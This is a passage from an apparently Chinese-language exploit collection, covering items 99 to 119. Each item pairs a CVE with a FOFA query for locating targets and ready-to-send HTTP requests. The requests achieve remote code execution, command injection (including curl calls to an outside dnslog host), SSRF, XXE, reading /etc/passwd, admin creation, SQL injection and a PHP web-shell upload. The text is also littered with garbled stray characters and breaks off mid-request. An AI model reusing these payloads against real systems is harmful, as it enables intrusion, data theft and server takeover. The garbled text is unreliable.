1 M/ {) t( L" T& A1 PAccept: */*
) f' f! J: v; c' |7 k1 A/ TAccept-Encoding: gzip, deflate! K$ U; V- u4 U6 V4 t% a' a6 [
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& b5 ?' C3 G4 l: T- Y* r# KContent-Type: application/x-www-form-urlencoded; charset=UTF-8
* E! A" l* Z' { ^- fX-Requested-With: XMLHttpRequest
! J, I: X" b- z4 @, j# A
0 n* Z$ f" d8 {$ Lid=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B4 l( U' f# ?$ i9 t
* c5 l, M0 @% c
2 G( e4 @ n4 i$ w& F7 [& M99. Ncast盈可视高清智能录播系统busiFacade RCE; q7 b' e% P7 G* Z: f
CVE-2024-0305
+ h4 p _' j: B0 I' l) @FOFA:app="Ncast-产品" && title=="高清智能录播系统"
7 D# a$ D4 F2 j" K0 R5 m( uPOST /classes/common/busiFacade.php HTTP/1.1
& r! `( D# {7 K5 a% x& QHost: 192.168.40.130:8080
* I2 }! L a; Y5 ~/ d9 cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
1 A$ m4 ?( Q1 I' \; m# {Connection: close7 G" Y' Q0 E1 [4 b N( M+ z8 w& s
Content-Length: 154
( G$ U! q. |# f; @# B& mAccept: */*. I) T/ f$ N& u9 v2 C) `, n
Accept-Encoding: gzip, deflate
. O3 x8 Y" h* V0 x* ^2 dAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: ~' g+ |: _2 q) a/ Q
Content-Type: application/x-www-form-urlencoded; charset=UTF-8+ v, `/ \" H5 P# a! O
X-Requested-With: XMLHttpRequest
$ a4 P1 k$ J; B0 T
+ l+ i" [1 d$ k5 ]%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
- ~. X8 T) T, K% S
" c& f: x; U2 m6 |0 r
* u) U4 x2 |7 f100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传$ c' j: H' N* s) O$ R
CVE-2024-0352& ]2 ^* g* L+ ]5 r8 W- S
FOFA:icon_hash="874152924") c( h5 |5 v/ K$ H. S
POST /api/file/formimage HTTP/1.1
0 G6 l7 X: s" b/ L; wHost: 192.168.40.130; @, E# e4 |2 Z; D4 l# d& e# v
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
! c5 ^$ V* U# q, x7 i6 bConnection: close# t D/ l) `. ~
Content-Length: 201
9 y& P6 t2 b7 T) a, x, g! ZContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei4 E( ^6 ]$ U0 ^' \
Accept-Encoding: gzip
. l+ }7 E* v) _% b) T, z: u( {2 w, s4 J% q# s- d% @
------WebKitFormBoundarygcflwtei! p' b9 K. @; l3 g+ @) {& d
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
# S6 h ?3 b8 C3 \Content-Type: application/x-php
" |! t4 t. r/ `, T( |) F( j: E9 c# O# D
2ayyhRXiAsKXL8olvF5s4qqyI2O
& ^* A. ?: t3 X) a------WebKitFormBoundarygcflwtei--
+ B( e5 m( @( W: j( x. u* n7 y# `
( g, b# @1 ~ L4 w" h
% z+ ^! n5 N! V( U' x8 Z101. ivanti policy secure-22.6命令注入
; E {/ |( G0 g! S5 {CVE-2024-21887
) ?# z* v/ S: x! `+ KFOFA:body="welcome.cgi?p=logo"1 `8 l$ n/ U7 a: Z, ~& @+ M- p
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1$ x% s& B3 X& R1 ^! J/ ]
Host: x.x.x.xx.x.x.x& R; J4 N/ D$ I
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.369 x1 l. j* n. [4 B
Connection: close
# r3 n3 ]7 X- NAccept-Encoding: gzip& v4 Z$ B( W3 ?# J6 i a8 _, k
( ~7 |. n# e2 X$ n, ]; q
1 t" }# H% J$ A- }4 Z( I
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行" s5 \1 X3 v1 {' j
CVE-2024-21893
/ a* ^7 B3 s0 e& H' V$ {3 SFOFA:body="welcome.cgi?p=logo"
( W6 K+ o, V6 zPOST /dana-ws/saml20.ws HTTP/1.1. N/ V/ ^3 X- O E. g; {
Host: x.x.x.x+ U, O1 _) _9 V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 p Y% a( A$ h# U1 w
Connection: close
+ d: d* x6 ]4 v( W" y- v, hContent-Length: 792' G0 Q. Z P% @
Accept-Encoding: gzip" p- h4 n+ L9 a
+ s# q; M4 H2 q9 T0 i0 l$ F z
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>* C& P) R8 D) z, p. t7 \; L% |+ R
& r, e' n! ^: N& |
103. Ivanti Pulse Connect Secure VPN XXE* D9 `- Y* \* }/ q4 \0 P+ s( ?& o
CVE-2024-220249 f7 V2 ]4 N" i% i: i7 _( H
FOFA:body="welcome.cgi?p=logo"
* v- g+ V4 k+ s9 UPOST /dana-na/auth/saml-sso.cgi HTTP/1.1; E, ]" o, L4 R% i% t" N# F
Host: 192.168.40.130:111! K8 ]5 S0 _: {( I
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
# M. d; e6 L4 H4 @Connection: close
9 v2 b. f( a7 B; X: jContent-Length: 204: E9 n- h1 O7 ~) r7 G' r, q
Content-Type: application/x-www-form-urlencoded
- y: D& k7 [: H. q* R+ x2 OAccept-Encoding: gzip; y; I) V ]1 K
: `& u; E# w* |; t) O/ ^0 J4 ]8 j
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
0 }% e/ w2 H }- t' p2 T0 {0 q6 k
* ?8 E7 A4 d0 g4 W; i, n% w# b: t6 B5 G1 ~, k; t
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
2 H* U+ H' f Q9 N/ W# A4 ~: G, {<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r> o6 d( r6 Z) R1 _4 Y+ E
k s& `/ |4 W0 M) J" w/ ~$ B& {' n( _3 K4 o- ^
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
1 Q6 o O% H% kCVE-2024-05696 @0 ]0 [; d3 I# |: X; R1 U
FOFA:title="TOTOLINK"- M7 P5 x; e6 Y) @1 e" }1 w
POST /cgi-bin/cstecgi.cgi HTTP/1.1
4 j3 m$ {2 |1 \+ ~* LHost:192.168.0.1
& |- w+ H* ?: r- ~2 b; W% \Content-Length:41
& m: ~( u& u: L. p- yAccept:application/json,text/javascript,*/*;q=0.01" q2 D" U0 o) d8 k% K& A# q
X-Requested-with: XMLHttpRequest# |" G2 s9 y2 n* j) w7 ^; q5 J
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
1 \4 a% H0 g, a( DContent-Type: application/x-www-form-urlencoded:charset=UTF-8
5 Y n5 w2 @9 x+ ^: W9 N& F H |1 rOrigin: http://192.168.0.1
" ~- R# r& E; r8 J( bReferer: http://192.168.0.1/advance/index.html?time=1671152380564
, G# F7 q8 W' w" G7 RAccept-Encoding:gzip,deflate, E7 N) w. Z3 t
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7. _9 Z# z6 n9 f* V
Connection:close1 a. i' D+ G- B" }
' ?* X. D4 t. U3 t: g9 \9 G& Y, Z) m{
3 y* m4 Y* S0 ]' j' k9 L"topicurl":"getSysStatusCfg",
- Q5 S0 R6 f" S"token":""1 b* c \& A+ c+ L
}
$ I/ u; [9 o' {/ v2 T
( \+ G8 e J! w* L' }' g8 h* R105. SpringBlade v3.2.0 export-user SQL 注入; a+ L5 V$ O/ h7 g% _: M
FOFA:body="https://bladex.vip"' }% K# O# q# c: y: y' g# d
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
8 T* d7 W# e! Z) T, {
* v5 e5 _ U9 m9 Y0 I6 d& G106. SpringBlade dict-biz/list SQL 注入
6 E5 S$ m! y2 W. c- n6 eFOFA:body="Saber 将不能正常工作"/ A/ m9 ~$ U0 Y$ i1 }* k3 q& ^
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.15 X) H# e$ N4 N, v2 @7 O
Host: your-ip- v# v' H; U0 l! E* I3 m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
8 I9 J8 t, c7 I& bBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
* s" e7 O- k, X) E% EAccept-Encoding: gzip, deflate
* y, Q9 }) e! Y+ v/ o" l$ r- g1 RAccept-Language: zh-CN,zh;q=0.9
! G# ]: R* P$ EConnection: close
( B6 \( S2 t0 E2 a% U# e" B6 {; {+ M
2 x' ? C+ A1 C% q: s a7 g/ X7 [
' |+ _2 g9 H c) [* E107. SpringBlade tenant/list SQL 注入, ^. R9 c4 z$ Y2 n- h6 D
FOFA:body="https://bladex.vip"( D2 S/ z1 O9 p9 j& h+ V3 P
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
% Q# H0 p" L" E# d4 x% m4 Y; EHost: your-ip
9 u9 c! a# ~& T+ i; eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
/ L' J; ?+ J! F0 U+ HBlade-Auth:替换为自己的. ?" J8 _& [8 ]! o8 A6 ]8 S
Connection: close
' S) s7 R0 X$ ]0 W6 Z8 J$ s1 q/ l, x W- k9 p& ~
& z! Z) R( }$ o; H
108. D-Tale 3.9.0 SSRF: ?+ i4 L6 |4 |& q0 [! l8 c' z
CVE-2024-216426 l0 R1 z9 I' _! Y- J
FOFA:"dtale/static/images/favicon.png"! R V0 r. J, X* _- m9 X
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1& w% e" q2 }& d$ r( [
Host: your-ip# W1 T% F* L. j- `% P/ M' s u
Accept: application/json, text/plain, */*, D! M" |7 I4 r- z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+ _8 M1 m9 l7 W. fAccept-Encoding: gzip, deflate2 k0 U( Q) ]. ~* {
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
. o4 u! h' I& t! u8 Q- KConnection: close6 M) m* R9 G9 }8 O3 [; v
; L# i* d- @) F& y* O; @
( @$ E3 N( O! |- ?! X
109. Jenkins CLI 任意文件读取
: M$ k) e6 |- g0 |3 g& [CVE-2024-23897/ F S. T4 W3 m/ C1 U
FOFA:header="X-Jenkins"
) N7 `- S4 O: \ T$ ~( n% q! jPOST /cli?remoting=false HTTP/1.1
& v: B; w, W% W; w# T0 Z5 vHost:# F1 N, ?! L g
Content-type: application/octet-stream, ?, y! H2 n {+ S
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
( l; E6 e; V9 ^& ?; v) A" \Side: upload5 v3 i' O( W1 D- j# e9 U
Connection: keep-alive$ a. N3 B. Q6 I0 t
Content-Length: 163' z* U n% ~. \- x! l* X8 d+ V
# u+ O5 H' ~2 Y5 [7 V! p0 Wb'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'+ ~/ s/ y1 X1 W6 Q7 e
# Y: t6 B) Y& u- t, m6 A' h* _
+ f; q5 p; d2 e7 q# F
POST /cli?remoting=false HTTP/1.10 w1 l0 D+ Q" C3 H8 D5 B
Host:
* B2 d- k4 f7 C: VSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e923 k7 S8 R3 P; F1 I: Y+ P
download
& \# G% e% E$ Y7 I* z4 [- W6 NContent-Type: application/x-www-form-urlencoded2 f/ m* f* @' |
Content-Length: 0
% ~* b& V& T! w* Q8 h2 o# n" i+ d2 H3 x& _ p' k5 M5 ~
% a7 P: G' K6 \/ U9 F: `7 OERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin$ n' X3 U. e( a" s& M
java -jar jenkins-cli.jar help
{- Z( v! }* z8 q* W7 n8 r[COMMAND]$ \8 W9 C( R: d5 V w0 X' c
Lists all the available commands or a detailed description of single command.4 x9 R! R' D: R
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
# o3 u9 j4 I: p3 f5 j2 {, w. {
; ^9 A7 f& n3 [$ s4 }7 W
- ^5 ]% e F: e110. Goanywhere MFT 未授权创建管理员
6 k; F* n6 _. S; c7 s& Y& tCVE-2024-0204
/ [$ B" U: s4 gFOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
0 F7 h: a$ L! i9 e- L# cGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
( z) ~" Y7 S! a; B2 vHost: 192.168.40.130:8000
: M6 I- x+ l; Q, kUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
6 P2 d& R* D+ Q& D6 }! IConnection: close
9 }$ q0 W1 ?/ T3 aAccept: */*
$ p) G! i; W; UAccept-Language: en+ h* }/ h& c$ U( a# `3 f' n
Accept-Encoding: gzip
9 D/ k6 C% k H4 r' A5 ?+ p& D. r. Q2 o
0 R* `: M" ~3 ?- e) q8 o. i1 B111. WordPress Plugin HTML5 Video Player SQL注入
2 A, r0 G' U7 MCVE-2024-10619 i: ^( @) {2 w' l2 Q6 W( C# W
FOFA:"wordpress" && body="html5-video-player"
4 E7 B4 R# Z" |* Q; ^! A7 KGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.10 h g8 u( z2 y: I3 Z# {- Y
Host: 192.168.40.130:112, {! V( }, P) V+ ~
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.360 H7 J) W& {3 I* z Y: K- v
Connection: close
/ Z1 J: t& D* I0 F1 kAccept: */*4 z0 J* T: U0 [- v" D. p
Accept-Language: en4 Y/ }& K$ O; I, q! W; `
Accept-Encoding: gzip
( w" G- p2 i' ]; K1 m; ?2 F- c) _, E) n
# K+ }% p, S1 w
112. WordPress Plugin NotificationX SQL 注入9 ]' X; F. g* j
CVE-2024-1698( ~& w" _! `. R/ g7 s
FOFA:body="/wp-content/plugins/notificationx"' X1 v% t6 i/ {+ d. W9 x% P) [
POST /wp-json/notificationx/v1/analytics HTTP/1.1- [/ f+ X. T; D
Host: {{Hostname}}
. C' I+ ]; ?5 yContent-Type: application/json2 y* Z1 F( [) @& m# S( `
4 w5 R. S$ Z/ t3 T q5 C. _* i
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}! P( E* s1 s- x3 F$ ?. n
e( K0 f. e; @: j% S Y. `
4 T$ M& e# H' D& y5 x! T6 X
113. WordPress Automatic 插件任意文件下载和SSRF( R* K8 |& V4 @5 T* n5 v( W6 e
CVE-2024-279542 J5 B: k% t- _2 N8 ?, ^) \
FOFA:"/wp-content/plugins/wp-automatic"
. `0 g }( D3 r- d2 g2 L3 hGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
, Z8 E) u$ G6 @2 @4 THost: x.x.x.x7 G+ s. m. ^5 F1 u: t' U
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
! s/ f2 I$ v8 |0 nConnection: close
}$ ~) E" `" m; M' x+ D1 r- }* l* {Accept: */*& k$ R$ q" d4 b% {3 G" g* ~" @
Accept-Language: en
H$ P0 S' ]* D8 @' oAccept-Encoding: gzip
: N1 t( F) E3 M7 x2 ^. v( z+ i9 n4 P- m* L E" G7 d3 q
) a$ a: ~3 O! i114. WordPress MasterStudy LMS插件 SQL注入
2 `9 s! A7 C) K: |5 Y oFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
% s# e! K, x; o" Z6 G* B3 Z% @# \: KGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.17 s+ E, x; r6 S* e
Host: your-ip
( M l9 s8 @; W( }8 `9 FUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
; J6 K8 M9 S# P2 Z7 PAccept-Charset: utf-8
' E0 b: ^* V( g0 mAccept-Encoding: gzip, deflate6 U4 l& s9 a0 b
Connection: close- [7 Y! V) W5 c& D/ |; t7 q
; [- W, y! W3 L! k
# X* X l: m3 ~ W' G* [, f- V115. WordPress Bricks Builder <= 1.9.6 RCE( i/ R- n b5 {5 j
CVE-2024-25600: N O0 n8 l" U) J+ v
FOFA: body="/wp-content/themes/bricks/"
* I3 |8 V! l; T7 A第一步,获取网站的nonce值
) U5 F( r* K/ o# t2 OGET / HTTP/1.1
1 D3 @# E0 C; i, uHost: x.x.x.x
* J( w( M2 T* o9 |6 ?1 w& ]User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36% D% U5 C2 F; \! E2 U# n
Connection: close6 {& \- k4 I! V0 f
Accept-Encoding: gzip, p7 H$ I, b# n8 ?1 y
! k$ r0 i2 T, q2 W
+ c% ^( G7 H6 a+ _& G5 S! F
第二步替换nonce值,执行命令
$ i- C# p% e3 Z$ cPOST /wp-json/bricks/v1/render_element HTTP/1.1% ^8 E$ n# I2 G6 t! f
Host: x.x.x.x
2 ?. C8 { n+ ?) b* v1 h2 `: rUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
2 J3 I' D4 S+ Q# g1 RConnection: close$ C, d4 F! A; g
Content-Length: 356, ^+ C& P, ~: R3 u) p) O( }' M
Content-Type: application/json2 _6 n! M, ?3 J. z2 G; h
Accept-Encoding: gzip
/ I' f) N1 d6 z, `/ E% U, {% t: t; }8 [
{1 h5 P4 d( ?" ?# h
"postId": "1",; ^' E" q& T& S9 F' k" r& @
"nonce": "第一步获得的值",) c( H/ O$ P' z/ i# Z0 I( L
"element": {
' d9 ?- o- }2 i2 |0 E B4 A "name": "container",% f" B @6 M; K5 p8 `6 y
"settings": {
/ C% L- p- M) |2 N' y/ F "hasLoop": "true",& Q) A2 e) U' d1 p
"query": {5 R9 G9 }1 B R6 @* f
"useQueryEditor": true,
* L: z& I# ]% P4 D+ X( u "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",; o) L$ |$ M, Y% J6 ~3 U
"objectType": "post"# X, { t" X Q3 J
}
1 }; {% s6 q1 y; h& H6 L ] }
6 D& R2 U9 s- G0 w6 U1 [9 a9 Q }
. C h, M; S- W, L. v}& B) Q: O4 K3 o
! g+ {$ x) W" l+ U5 q( o& z
9 M) \) f! J- n! h! @' z/ T: ?116. wordpress js-support-ticket文件上传) M% n9 B$ O+ P& d
FOFA:body="wp-content/plugins/js-support-ticket"* N$ G# N# J6 M- P- ?
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1- f+ J7 x# |. t/ ]: k
Host:
z6 c1 z1 T$ O, K1 I& E" VContent-Type: multipart/form-data; boundary=--------767099171
. C3 T- m2 p$ i" u+ f$ c$ ^; oUser-Agent: Mozilla/5.07 Z- `6 ^: X4 v% z# Z
- ~$ b3 J* h j4 z/ Y* G- `) X7 z: r
----------767099171( X |9 r2 q8 I/ Y% Q2 C
Content-Disposition: form-data; name="action"
' w0 v7 z- P3 n) aconfiguration_saveconfiguration
5 t% \7 w! k" Q$ W----------767099171
. s/ ]8 Y# a* }+ n* |; _2 @% I% TContent-Disposition: form-data; name="form_request"' w+ c1 ?- x2 f8 f j: G
jssupportticket
) G- t, M( e R2 u1 U" Z4 Q" M----------767099171
~% ]9 a" ^# A, `' lContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
* s t+ X, ^' |; d& i9 f5 ], ^Content-Type: image/png l% p" d* {: H* W
----------767099171--' L8 e s# X% g5 `
/ r5 Y3 m* d, f: V
9 l. t3 D8 G7 \, X' O) h* O
117. WordPress LayerSlider插件SQL注入
$ _& U, w& l9 S- x6 A/ L% Dversion:7.9.11 – 7.10.00 O! s @) [8 C$ f+ B
FOFA:body="/wp-content/plugins/LayerSlider/"+ O e# s& V) z8 m3 N# s% j# g* x
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
9 Q" D7 U1 b4 m5 `& ]* p" h% K- l. jHost: your-ip
' |7 f. p- q7 ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0# z9 B5 o% s8 W2 h0 X- M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, [" {( p6 e- E0 y* j- _9 w
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, s; S+ g1 ]* cAccept-Encoding: gzip, deflate, br
7 O( W4 b) z6 C& v2 g# n3 P# X& m0 v2 QConnection: close, q+ |: \! b+ Q3 v
Upgrade-Insecure-Requests: 1
& \& J/ h% \: ?; Y) @5 k: |, j+ ^/ N
, g( A @" a4 ^ I, S% \) Q
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
: S( R+ W2 f, m/ A: A$ s' ]& qCVE-2024-0939
# G6 \2 B0 ?" B3 [; v9 @) a2 `FOFA:title="Smart管理平台"# j3 `/ W1 p8 @' K5 F
POST /Tool/uploadfile.php? HTTP/1.1
: k) m. [6 t4 uHost: 192.168.40.130:84431 w X9 _! d d% g
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
. @. h: s, {8 @) t" W6 q& jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
. K+ \' S$ l3 n- z# f0 C- kAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 @( C t ^2 [0 c/ m$ n dAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 {9 M; h1 \# D1 f! ~Accept-Encoding: gzip, deflate" a$ q: v2 r% n& f9 u. e& j7 P
Content-Type: multipart/form-data; boundary=---------------------------139797012227476466340371828872 s" b% Q( m7 q# w" C
Content-Length: 4056 G2 k! M8 C) J: {2 a6 P0 A* S4 w
Origin: https://192.168.40.130:84430 p# y$ r: W% L' f) T4 s2 J. l. ~0 }
Referer: https://192.168.40.130:8443/Tool/uploadfile.php5 G- u$ V" S' F0 {, Y
Upgrade-Insecure-Requests: 1/ a9 u6 ^. @% `
Sec-Fetch-Dest: document
! ^, w4 \) R9 D2 ~# X+ I; C- s& MSec-Fetch-Mode: navigate
" E, H/ m+ ?7 |1 l+ P, TSec-Fetch-Site: same-origin
/ \7 Q _8 c. u- c% o5 tSec-Fetch-User: ?10 n+ M7 v) V: `: c0 o
Te: trailers0 p5 m6 R5 d/ u, |8 v
Connection: close
' I }8 B+ J* i H, ^1 U" l, v$ x0 ?' f6 j2 K2 E- H, x$ L) }3 G
-----------------------------139797012227476466340371828873 `3 [* V6 M0 h9 D: ^5 i
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
% |8 K8 O. U9 ?: P# E- GContent-Type: application/octet-stream2 a1 [& N" v2 J) I4 ]5 ~! Q
6 i" d% M# [$ T6 [1 {8 [<?php
8 G$ Q& q0 c2 y& O# }, asystem($_POST["passwd"]);
9 O, ~& }; l4 u4 S$ L" X?>
) y* f% C+ u7 C9 Z5 U-----------------------------13979701222747646634037182887. A- r+ [( d/ R
Content-Disposition: form-data; name="txt_path"/ ~ H6 J5 d5 V2 ?( v2 k4 `
: i+ Z! n9 b) A/ e! ^" X/home/src.php
! _, B, b2 _, Q/ ^: h3 S4 r* T-----------------------------13979701222747646634037182887--
! J7 R. v7 B# p8 Y, \1 i, M. E: `! Q3 W! d' d
8 b5 C/ V8 p8 P G8 Z访问/home/src.php$ A( C. F- f9 W6 e3 i2 M
8 H' v" J. o6 Y( w1 H. }' _119. 北京百绰智能S20后台sysmanageajax.php sql注入
$ O' m4 y5 E1 xCVE-2024-1254
6 n: p8 U* `/ BFOFA:title="Smart管理平台"
4 K7 F/ d3 A/ F9 e6 M% M先登录进入系统,默认账号密码为admin/admin/ C+ p+ d! p( L4 ?4 f) D7 c" g
POST /sysmanage/sysmanageajax.php HTTP/1.11
. n9 b8 W1 j/ b UHost: x.x.x.x
$ b/ A' x) A+ n. A% f( MCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee; p! R" r3 w9 ~/ I* k% X$ \1 V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.04 y$ a4 n ?1 E4 g: _* f
Accept: */*
9 F: Y, i/ T: R; {" g% {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) |5 x3 @5 ^2 uAccept-Encoding: gzip, deflate
2 q: j* v3 W+ s* m9 F2 SContent-Type: application/x-www-form-urlencoded;
1 n! J5 u' @, p& b* sContent-Length: 109
3 x" y% w6 Z% b! j9 ]& Z+ K, }Origin: https://58.18.133.60:8443
/ W7 f; g0 [6 U: @5 O/ GReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php
1 g; I0 O% v6 s! f; p1 o! o- hSec-Fetch-Dest: empty; r4 t. x# c2 {; E: \8 w% T0 R
Sec-Fetch-Mode: cors1 }/ |0 t3 J+ \ P" B! L
Sec-Fetch-Site: same-origin
& l9 n( g2 y+ sX-Forwarded-For: 1.1.1.1
9 K( t- @8 S+ E; ]5 ?X-Originating-Ip: 1.1.1.18 j- A' U# a9 M9 V0 F9 M
X-Remote-Ip: 1.1.1.1
6 w( Q- z. g( oX-Remote-Addr: 1.1.1.1' h9 @7 `$ F# y3 U+ U
